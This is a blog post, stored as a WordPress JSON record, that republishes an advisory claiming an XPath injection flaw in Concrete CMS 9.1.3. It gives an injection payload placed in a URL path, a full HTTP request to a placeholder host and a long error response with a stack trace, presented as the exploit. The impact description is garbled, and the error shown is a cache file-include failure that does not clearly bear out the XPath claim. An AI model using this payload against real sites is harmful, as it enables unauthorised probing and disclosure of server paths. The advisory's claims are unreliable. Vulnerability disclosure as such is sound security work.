{"id":34187,"date":"2022-11-29T19:19:41","date_gmt":"2022-11-29T16:19:41","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170041\/concretecms913-xpath.txt"},"modified":"2022-11-30T08:40:39","modified_gmt":"2022-11-30T05:10:39","slug":"concrete-cms-9-1-3-xpath-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/concrete-cms-9-1-3-xpath-injection\/","title":{"rendered":"Concrete CMS 9.1.3 XPATH Injection"},"content":{"rendered":"

## Title: concretecms-9.1.3 Xpath injection
\n## Author: nu11secur1ty
\n## Date: 11.28.2022
\n## Vendor: https:\/\/www.concretecms.org\/
\n## Software: https:\/\/www.concretecms.org\/download
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/concretecms.org\/2022\/concretecms-9.1.3<\/p>\n

## Description:
\nThe URL path folder `3` appears to be vulnerable to XPath injection attacks.
\nThe test payload 50539478′ or 4591=4591– was submitted in the URL
\npath folder `3`, and an XPath error message was returned.
\nThe attacker can flood with requests the system by using this
\nvulnerability to untilted he receives the actual paths of the all
\ncontent of this system which content is stored on some internal or
\nexternal server.<\/p>\n

## STATUS: HIGH Vulnerability<\/p>\n

[+] Exploits:
\n00:
\n“`GET
\nGET \/concrete-cms-9.1.3\/index.php\/ccm50539478’%20or%204591%3d4591–%20\/assets\/localization\/moment\/js
\nHTTP\/1.1
\nHost: pwnedhost.com
\nAccept-Encoding: gzip, deflate
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9
\nAccept-Language: en-US;q=0.9,en;q=0.8
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)
\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.5304.107
\nSafari\/537.36
\nConnection: close
\nCache-Control: max-age=0
\nUpgrade-Insecure-Requests: 1
\nSec-CH-UA: “.Not\/A)Brand”;v=”99″, “Google Chrome”;v=”107″, “Chromium”;v=”107″
\nSec-CH-UA-Platform: Windows
\nSec-CH-UA-Mobile: ?0
\nContent-Length: 0
\n“`<\/p>\n

[+] Response:<\/p>\n

“`HTTP
\nHTTP\/1.1 500 Internal Server Error
\nDate: Mon, 28 Nov 2022 15:32:22 GMT
\nServer: Apache\/2.4.54 (Win64) OpenSSL\/1.1.1p PHP\/7.4.30
\nX-Powered-By: PHP\/7.4.30
\nConnection: close
\nContent-Type: text\/html;charset=UTF-8
\nContent-Length: 592153<\/p>\n

<!DOCTYPE html><!–<\/p>\n

Whoops\\Exception\\ErrorException: include(): Failed opening
\n‘C:\/xampp\/htdocs\/pwnedhost\/concrete-cms-9.1.3\/application\/files\/cache\/expensive\\0fea6a13c52b4d47\\25368f24b045ca84\\38a865804f8fdcb6\\57cd99682e939275\\3e7d68124ace5663\\5a578007c2573b03\\d35376a9b3047dec\\fee81596e3895419.php’
\nfor inclusion (include_path=’C:\/xampp\/htdocs\/pwnedhost\/concrete-cms-9.1.3\/concrete\/vendor;C:\\xampp\\php\\PEAR’)
\nin file C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Driver\\FileSystem\\NativeEncoder.php
\non line 26
\nStack trace:
\n1. Whoops\\Exception\\ErrorException->()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Driver\\FileSystem\\NativeEncoder.php:26
\n2. include() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Driver\\FileSystem\\NativeEncoder.php:26
\n3. Stash\\Driver\\FileSystem\\NativeEncoder->deserialize()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Driver\\FileSystem.php:201
\n4. Stash\\Driver\\FileSystem->getData()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Item.php:631
\n5. Stash\\Item->getRecord()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Item.php:321
\n6. Stash\\Item->executeGet()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Item.php:252
\n7. Stash\\Item->get()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Item.php:346
\n8. Stash\\Item->isMiss()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Cache\\Adapter\\LaminasCacheDriver.php:67
\n9. Concrete\\Core\\Cache\\Adapter\\LaminasCacheDriver->internalGetItem()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\laminas\\laminas-cache\\src\\Storage\\Adapter\\AbstractAdapter.php:356
\n10. Laminas\\Cache\\Storage\\Adapter\\AbstractAdapter->getItem()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\laminas\\laminas-i18n\\src\\Translator\\Translator.php:601
\n11. Laminas\\I18n\\Translator\\Translator->loadMessages()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\laminas\\laminas-i18n\\src\\Translator\\Translator.php:434
\n12. Laminas\\I18n\\Translator\\Translator->getTranslatedMessage()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\laminas\\laminas-i18n\\src\\Translator\\Translator.php:349
\n13. Laminas\\I18n\\Translator\\Translator->translate()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Localization\\Translator\\Adapter\\Laminas\\TranslatorAdapter.php:69
\n14. Concrete\\Core\\Localization\\Translator\\Adapter\\Laminas\\TranslatorAdapter->translate()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\bootstrap\\helpers.php:27
\n15. t() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\blocks\\top_navigation_bar\\view.php:47
\n16. include() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Block\\View\\BlockView.php:267
\n17. Concrete\\Core\\Block\\View\\BlockView->renderViewContents()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\AbstractView.php:164
\n18. Concrete\\Core\\View\\AbstractView->render()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Area\\Area.php:853
\n19. Concrete\\Core\\Area\\Area->display()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Area\\GlobalArea.php:128
\n20. Concrete\\Core\\Area\\GlobalArea->display()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\themes\\atomik\\elements\\header.php:11
\n21. include() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\View.php:125
\n22. Concrete\\Core\\View\\View->inc()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\themes\\atomik\\view.php:4
\n23. include() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\View.php:329
\n24. Concrete\\Core\\View\\View->renderTemplate()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\View.php:291
\n25. Concrete\\Core\\View\\View->renderViewContents()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\AbstractView.php:164
\n26. Concrete\\Core\\View\\AbstractView->render()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\controllers\\single_page\\page_not_found.php:19
\n27. Concrete\\Controller\\SinglePage\\PageNotFound->view()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Controller\\AbstractController.php:318
\n28. call_user_func_array()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Controller\\AbstractController.php:318
\n29. Concrete\\Core\\Controller\\AbstractController->runAction()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\ResponseFactory.php:188
\n30. Concrete\\Core\\Http\\ResponseFactory->controller()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\ResponseFactory.php:95
\n31. Concrete\\Core\\Http\\ResponseFactory->notFound()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\ResponseFactory.php:390
\n32. Concrete\\Core\\Http\\ResponseFactory->collectionNotFound()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\ResponseFactory.php:234
\n33. Concrete\\Core\\Http\\ResponseFactory->collection()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\DefaultDispatcher.php:132
\n34. Concrete\\Core\\Http\\DefaultDispatcher->handleDispatch()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\DefaultDispatcher.php:60
\n35. Concrete\\Core\\Http\\DefaultDispatcher->dispatch()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\DispatcherDelegate.php:39
\n36. Concrete\\Core\\Http\\Middleware\\DispatcherDelegate->next()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\FrameOptionsMiddleware.php:39
\n37. Concrete\\Core\\Http\\Middleware\\FrameOptionsMiddleware->process()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50
\n38. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate->next()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\StrictTransportSecurityMiddleware.php:36
\n39. Concrete\\Core\\Http\\Middleware\\StrictTransportSecurityMiddleware->process()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50
\n40. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate->next()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\ContentSecurityPolicyMiddleware.php:36
\n41. Concrete\\Core\\Http\\Middleware\\ContentSecurityPolicyMiddleware->process()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50
\n42. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate->next()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\CookieMiddleware.php:35
\n43. Concrete\\Core\\Http\\Middleware\\CookieMiddleware->process()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50
\n44. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate->next()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\ApplicationMiddleware.php:29
\n45. Concrete\\Core\\Http\\Middleware\\ApplicationMiddleware->process()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50
\n46. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate->next()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareStack.php:86
\n47. Concrete\\Core\\Http\\Middleware\\MiddlewareStack->process()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\DefaultServer.php:85
\n48. Concrete\\Core\\Http\\DefaultServer->handleRequest()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Foundation\\Runtime\\Run\\DefaultRunner.php:125
\n49. Concrete\\Core\\Foundation\\Runtime\\Run\\DefaultRunner->run()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Foundation\\Runtime\\DefaultRuntime.php:102
\n50. Concrete\\Core\\Foundation\\Runtime\\DefaultRuntime->run()
\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\dispatcher.php:45
\n51. require() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\index.php:2<\/p>\n

–><html>
\n<head>
\n<meta charset=”utf-8″>
\n<meta name=”robots” content=”noindex,nofollow”\/>
\n<meta name=”viewport” content=”width=device-width,
\ninitial-scale=1, shrink-to-fit=no”\/>
\n<title>Concrete CMS has encountered an issue.<\/title><\/p>\n

<style>body {
\nfont: 12px “Helvetica Neue”, helvetica, arial, sans-serif;
\ncolor: #131313;
\nbackground: #eeeeee;
\npadding:0;
\nmargin: 0;
\nmax-height: 100%;<\/p>\n

text-rendering: optimizeLegibility;
\n}
\na {
\ntext-decoration: none;
\n}<\/p>\n

.Whoops.container {
\nposition: relative;
\nz-index: 9999999999;
\n}<\/p>\n

.panel {
\noverflow-y: scroll;
\nheight: 100%;
\nposition: fixed;
\nmargin: 0;
\nleft: 0;
\ntop: 0;
\n}<\/p>\n

.branding {
\nposition: absolute;
\ntop: 10px;
\nright: 20px;
\ncolor: #777777;
\nfont-size: 10px;
\nz-index: 100;
\n}
\n.branding a {
\ncolor: #e95353;
\n}<\/p>\n

header {
\ncolor: white;
\nbox-sizing: border-box;
\nbackground-color: #2a2a2a;
\npadding: 35px 40px;
\nmax-height: 180px;
\noverflow: hidden;
\ntransition: 0.5s;
\n}<\/p>\n

header.header-expand {
\nmax-height: 1000px;
\n}<\/p>\n

.exc-title {
\nmargin: 0;
\ncolor: #bebebe;
\nfont-size: 14px;
\n}
\n.exc-title-primary, .exc-title-secondary {
\ncolor: #e95353;
\n}<\/p>\n

.exc-message {
\nfont-size: 20px;
\nword-wrap: break-word;
\nmargin: 4px 0 0 0;
\ncolor: white;
\n}
\n.exc-message span {
\ndisplay: block;
\n}
\n.exc-message-empty-notice {
\ncolor: #a29d9d;
\nfont-weight: 300;
\n}<\/p>\n

…….<\/p>\n

“`<\/p>\n

## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/concretecms.org\/2022\/concretecms-9.1.3)<\/p>\n

## Proof and Exploit:
\n[href](https:\/\/streamable.com\/4f60ka)<\/p>\n

## Time spent
\n`03:00:00`<\/p>\n","protected":false},"excerpt":{"rendered":"

## Title: concretecms-9.1.3 Xpath injection ## Author: nu11secur1ty ## Date: 11.28.2022 ## Vendor: https:\/\/www.concretecms.org\/ ## Software: https:\/\/www.concretecms.org\/download ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/concretecms.org\/2022\/concretecms-9.1.3 ## Description: The URL path folder `3` appears to be vulnerable to XPath injection attacks. The test payload 50539478′ or 4591=4591– was submitted in the URL path folder `3`, and an XPath error message was …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34187","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34187"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34187\/revisions"}],"predecessor-version":[{"id":34199,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34187\/revisions\/34199"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}